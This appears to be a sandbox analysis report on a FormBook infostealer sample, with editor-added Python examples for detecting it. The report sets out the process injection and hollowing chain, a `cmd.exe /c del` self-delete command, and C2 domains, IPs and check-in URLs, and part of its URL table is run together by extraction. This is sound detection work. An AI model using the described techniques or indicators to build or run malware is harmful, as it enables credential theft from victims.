          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
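The entries in this section describe one chain: the sample sets a thread context and queues an APC in explorer.exe (PID 3388), the injected explorer.exe starts making the HTTP connections, unmaps the image of a freshly started cmmon32.exe and writes into it, and cmmon32.exe finally runs `cmd.exe /c del` on the original file. Each step is a weak signal on its own; together they are a high-confidence detection. The following is an added example by this editor, not Joe Sandbox code: a small correlator run over a constructed event log whose records mirror the report's lines. The event field names, the PIDs other than 3388 and the rule names are this example's own assumptions.

```python
"""Correlate process-injection telemetry into findings, mirroring this report's chain.

Added example for this report. The EVENTS log is constructed to follow the
sandbox entries above; the record layout is an assumption of this example,
not a real EDR schema.
"""
import re
from collections import defaultdict

# Images that should not originate C2-style traffic on their own. explorer.exe
# does make some legitimate connections, so in production pair this with a
# destination allowlist; the injected-pid correlation below is the stronger signal.
SYSTEM_IMAGES = {"explorer.exe", "cmmon32.exe"}


def image(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return [(rule, actor_image, detail)] in the order the evidence appears."""
    findings = []
    injected = set()              # pids some other process hijacked a thread of or wrote into
    unmapped = defaultdict(set)   # actor pid -> target pids it unmapped an image section from
    for e in events:
        kind, actor, pid = e["kind"], image(e["actor"]), e["pid"]
        if kind == "section_unmap":
            # NtUnmapViewOfSection on a foreign process: first step of hollowing
            unmapped[pid].add(e["target_pid"])
            injected.add(e["target_pid"])
        elif kind == "thread_context_set":
            injected.add(e["target_pid"])
            rule = ("process_hollowing" if e["target_pid"] in unmapped[pid]
                    else "remote_thread_context")
            findings.append((rule, actor, e["target_pid"]))
        elif kind == "apc_queued" and e["target_pid"] != pid:
            injected.add(e["target_pid"])
            findings.append(("apc_injection", actor, e["target_pid"]))
        elif kind == "network_connect" and (actor in SYSTEM_IMAGES or pid in injected):
            findings.append(("system_process_network", actor, f'{e["ip"]}:{e["port"]}'))
        elif kind == "process_create":
            child = image(e["child"])
            if child == "cmd.exe" and re.search(r"\bdel\b", e["cmdline"], re.IGNORECASE):
                findings.append(("self_delete", actor, e["cmdline"]))
            if pid in injected:
                findings.append(("injected_process_spawns_child", actor, child))
    return findings


SAMPLE = r"C:\Users\user\Desktop\UGGJ4NnzFz.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMMON = r"C:\Windows\SysWOW64\cmmon32.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Constructed log following the report; PIDs other than 3388 are made up.
EVENTS = [
    {"kind": "process_create", "actor": SAMPLE, "pid": 1000,
     "child": SAMPLE, "child_pid": 1010, "cmdline": f"'{SAMPLE}'"},
    {"kind": "thread_context_set", "actor": SAMPLE, "pid": 1010, "target_pid": 3388},
    {"kind": "apc_queued", "actor": SAMPLE, "pid": 1010, "target_pid": 3388},
    {"kind": "network_connect", "actor": EXPLORER, "pid": 3388,
     "ip": "62.149.128.40", "port": 80},
    {"kind": "process_create", "actor": EXPLORER, "pid": 3388,
     "child": CMMON, "child_pid": 4120, "cmdline": CMMON},
    {"kind": "section_unmap", "actor": SAMPLE, "pid": 1010, "target_pid": 4120,
     "base": 0xCA0000},
    {"kind": "thread_context_set", "actor": SAMPLE, "pid": 1010, "target_pid": 4120},
    {"kind": "process_create", "actor": CMMON, "pid": 4120,
     "child": CMD, "child_pid": 4200, "cmdline": f"{CMD} /c del '{SAMPLE}'"},
]

if __name__ == "__main__":
    for rule, actor, detail in analyze(EVENTS):
        print(f"{rule:32} {actor:18} {detail}")
```

The hollowing rule deliberately requires both the unmap and the thread-context write from the same actor against the same target; a thread-context write alone is reported separately because debuggers and some legitimate tooling also do it. Feeding real Sysmon or ETW data in means mapping its event types onto the five `kind` values used here.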

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, file source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
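Both Yara sections (Stealing of Sensitive Information and Remote Access Functionality) cite the same fourteen artifacts. Triage starts by asking which process and which page protection each hit lives in: the 0x40 (execute, read, write) private regions in processes 1 and 9 are where the unpacked FormBook payload sits, while the 0x04 hits are plain read-write heap. The parser below is an added example by this editor, not Joe Sandbox tooling. It assumes the `.sdmp` name fields are process index, stage, dump id, base address, Win32 page protection and memory type, and that the `.unpack` names are process index, stage, image name, base address, index and an optional `raw` marker; that field layout is this editor's reading of the naming convention, not something the report documents.

```python
"""Parse the sandbox artifact names cited by the Yara hits and group them by
process and memory protection.

Added example for this report. The artifact list below is copied from the
report's Yara sections; the field layout of the names is an assumption.
"""
import re
from collections import defaultdict

# Win32 page-protection and memory-type constants (documented values).
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layouts (this editor's reading of the naming convention):
#   <process>.<stage>.<dump id>.<base>.<protection>.<type>.sdmp
#   <process>.<stage>.<image>.<base>.<index>[.raw].unpack
SDMP = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
                  r"([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.IGNORECASE)
UNPACK = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-F]+)\.(\d+)(\.raw)?\.unpack$",
                    re.IGNORECASE)


def parse_artifact(name):
    """Return a dict describing one artifact name, or raise ValueError."""
    m = SDMP.match(name)
    if m:
        protect, mtype = int(m[5], 16), int(m[6], 16)
        return {"kind": "memory", "process": int(m[1], 16), "stage": int(m[2], 16),
                "dump_id": int(m[3]), "base": int(m[4], 16),
                # mask modifier bits such as PAGE_GUARD (0x100) before the lookup
                "protect": PAGE.get(protect & 0xFF, hex(protect)),
                "type": MEM.get(mtype, hex(mtype))}
    m = UNPACK.match(name)
    if m:
        return {"kind": "unpacked_pe", "process": int(m[1]), "stage": int(m[2]),
                "image": m[3], "base": int(m[4], 16), "index": int(m[5]),
                "raw": m[6] is not None}
    raise ValueError(f"unrecognised artifact name: {name}")


def summarize(names):
    """Per process: hit count, RWX region bases and unpacked image names."""
    by_proc = defaultdict(list)
    for n in names:
        a = parse_artifact(n)
        by_proc[a["process"]].append(a)
    out = {}
    for proc, arts in sorted(by_proc.items()):
        out[proc] = {
            "hits": len(arts),
            "rwx_regions": sorted({a["base"] for a in arts
                                   if a.get("protect") == "PAGE_EXECUTE_READWRITE"}),
            "unpacked_images": sorted({a["image"] for a in arts
                                       if a["kind"] == "unpacked_pe"}),
        }
    return out


# The fourteen artifacts cited by the Yara sections of this report.
YARA_HITS = [
    "00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp",
    "00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp",
    "00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp",
    "00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp",
    "00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp",
    "00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp",
    "00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp",
    "00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp",
    "1.1.UGGJ4NnzFz.exe.400000.0.unpack",
    "1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack",
    "1.2.UGGJ4NnzFz.exe.400000.0.unpack",
    "0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack",
    "0.2.UGGJ4NnzFz.exe.2290000.3.unpack",
    "1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack",
]

if __name__ == "__main__":
    for proc, info in summarize(YARA_HITS).items():
        rwx = ", ".join(f"0x{b:X}" for b in info["rwx_regions"]) or "none"
        print(f"process {proc}: {info['hits']} hits, RWX regions: {rwx}, "
              f"unpacked images: {info['unpacked_images'] or 'none'}")
```

The summary makes the chain visible at a glance: process 0 (the NSIS installer) only holds the payload in a read-write heap buffer at 0x2290000, process 1 (the hollowed copy of the sample) has it mapped RWX at its own image base and two further regions, and process 9 (cmmon32.exe) carries two RWX copies. The `.unpack` artifacts with `stage` 1 are the images captured at injection time and are the ones to feed to a disassembler.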

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API (1) | Path Interception | Process Injection (512) | Virtualization/Sandbox Evasion (3) | Input Capture (1) | Security Software Discovery (131) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
          Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (512) | LSASS Memory | Virtualization/Sandbox Evasion (3) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (1) | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (3) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing (11) | LSA Secrets | File and Directory Discovery (3) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (13) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Digits in parentheses are the report's colour-coded signature hit-count badges for that technique, run together by extraction (so "512" is three badges, not a count of 512). Techniques without a badge are matrix placeholders with no signature hit.

          Behavior Graph

          Behavior Graph ID: 432566, Sample: UGGJ4NnzFz, Start date: 10/06/2021, Architecture: WINDOWS, Score: 100

          Top-level DNS/IP: www.topazsnacks.com, topazsnacks.com
          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

          UGGJ4NnzFz.exe (20) [started]
            dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
            signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            +- UGGJ4NnzFz.exe [started]
                 signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                 +- explorer.exe [injected]
                      DNS/IP: growwithjenn.com 160.153.136.3, 49749, 80, GODADDY-AMSDE, United States; sw-advisers.com 157.245.232.77, 49743, 80, DIGITALOCEAN-ASNUS, United States; 16 other IPs or domains
                      signatures: System process connects to network (likely due to code injection or exploit)
                      +- cmmon32.exe [started]
                           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                           +- cmd.exe (1) [started]
                                +- conhost.exe [started]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          UGGJ4NnzFz.exe | 29% | Virustotal |
          UGGJ4NnzFz.exe | 30% | ReversingLabs | Win32.Spyware.Noon
          UGGJ4NnzFz.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.UGGJ4NnzFz.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          1.1.UGGJ4NnzFz.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.UGGJ4NnzFz.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.UGGJ4NnzFz.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          9.2.cmmon32.exe.624368.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          9.2.cmmon32.exe.4a87960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.UGGJ4NnzFz.exe.2290000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.UGGJ4NnzFz.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482

          Domains

          Source | Detection | Scanner | Label
          protectpursuit.com | 4% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkT | 0% | Avira URL Cloud | safe
          www.rebeccannemontgomery.net/dp3a/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          protectpursuit.com | 165.22.38.5 | true | true | | unknown
          bring-wellness.com | 34.102.136.180 | true | false | | unknown
          sw-advisers.com | 157.245.232.77 | true | true | | unknown
          www.goldinsacks.com | 62.149.128.40 | true | true | | unknown
          freshdeliciousberryfarm.com | 34.102.136.180 | true | false | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          growwithjenn.com | 160.153.136.3 | true | true | | unknown
          topazsnacks.com | 135.181.180.74 | true | true | | unknown
          www.growwithjenn.com | unknown | unknown | true | | unknown
          www.oilleakgames.com | unknown | unknown | true | | unknown
          www.goodlukc.com | unknown | unknown | true | | unknown
          www.freshdeliciousberryfarm.com | unknown | unknown | true | | unknown
          www.topazsnacks.com | unknown | unknown | true | | unknown
          www.goldgrandpa.com | unknown | unknown | true | | unknown
          www.bring-wellness.com | unknown | unknown | true | | unknown
          www.sw-advisers.com | unknown | unknown | true | | unknown
          www.2dmaxximumrecords.com | unknown | unknown | true | | unknown
          www.allyexpense.com | unknown | unknown | true | | unknown
          www.protectpursuit.com | unknown | unknown | true | | unknown

                                              Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 | true | Avira URL Cloud: safe | unknown
          http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 | false | Avira URL Cloud: safe | unknown
          http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR | true | Avira URL Cloud: safe | unknown
          http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP | true | Avira URL Cloud: safe | unknown
          www.rebeccannemontgomery.net/dp3a/ | true | Avira URL Cloud: safe | low
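All five contacted URLs share the path `/dp3a/`, and the four with a query string carry the same `qXtd=VpFTeL6xRNZ0stZ0` pair while `rTWxa` changes per request and the host rotates through the domain list above. The host is therefore the wrong thing to block; the invariant part of the URI is what a network signature should key on. The script below is an added example by this editor, not part of the report or of any FormBook tooling: it derives that invariant from the report's own URL list and emits a Suricata rule. The `sid` is a placeholder in the local-rules range and the rule text assumes Suricata 5+ sticky-buffer syntax.

```python
"""Derive the invariant part of the C2 check-in URI from a sandbox URL list
and turn it into a Suricata rule.

Added example for this report. CONTACTED_URLS is copied from the report's
Contacted URLs table; everything else is this example's own code.
"""
from collections import defaultdict
from urllib.parse import urlsplit

CONTACTED_URLS = [
    "http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0",
    "http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0",
    "http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR",
    "http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP",
    "www.rebeccannemontgomery.net/dp3a/",
]


def split_url(url):
    """(host, path, {key: raw value}); values stay undecoded so '+' and '/' survive."""
    if "://" not in url:
        url = "http://" + url          # the report lists one entry without a scheme
    parts = urlsplit(url)
    query = {}
    for kv in parts.query.split("&"):
        if "=" in kv:
            k, v = kv.split("=", 1)
            query[k] = v
    return parts.hostname, parts.path, query


def profile(urls):
    """Group by URI path: hosts seen, parameters constant across the group, parameters that vary."""
    groups = defaultdict(list)
    for u in urls:
        host, path, query = split_url(u)
        groups[path].append((host, query))
    out = {}
    for path, entries in groups.items():
        with_query = [q for _, q in entries if q]
        keys = set.intersection(*(set(q) for q in with_query)) if with_query else set()
        constant = {k: with_query[0][k] for k in keys
                    if all(q[k] == with_query[0][k] for q in with_query)}
        out[path] = {"hosts": sorted({h for h, _ in entries}),
                     "constant": constant,
                     "variable": sorted(keys - set(constant))}
    return out


def suricata_rule(path, constant, sid):
    """Suricata 5+ rule on the invariant URI parts; sid is a placeholder in the local range."""
    contents = [f'content:"{path}";'] + [f'content:"{k}={v}";'
                                         for k, v in sorted(constant.items())]
    return ("alert http $HOME_NET any -> $EXTERNAL_NET any "
            '(msg:"FormBook-style C2 check-in URI"; flow:established,to_server; '
            "http.uri; " + " ".join(contents) +
            f" classtype:trojan-activity; sid:{sid}; rev:1;)")


if __name__ == "__main__":
    for path, info in profile(CONTACTED_URLS).items():
        print(f"{path}: {len(info['hosts'])} hosts, constant={info['constant']}, "
              f"variable={info['variable']}")
        print(suricata_rule(path, info["constant"], sid=1000001))
```

A rule built this way survives the host rotation but is tied to this build's path and constant parameter; newer samples change both, so treat the derived strings as campaign indicators rather than a family signature, and refresh them from each new report's Contacted URLs.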

                                              URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | UGGJ4NnzFz.exe | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp | false | |
                                                                high
                                                                http://nsis.sf.net/NSIS_ErrorUGGJ4NnzFz.exefalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.fonts.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&amp;rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTcmmon32.exe, 00000009.00000002.479471132.0000000004C02000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown

                                                                      Contacted IPs


                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
62.149.128.40 | www.goldinsacks.com | Italy | 31034 | ARUBA-ASNIT | true
165.22.38.5 | protectpursuit.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
160.153.136.3 | growwithjenn.com | United States | 21501 | GODADDY-AMSDE | true
34.102.136.180 | bring-wellness.com | United States | 15169 | GOOGLEUS | false
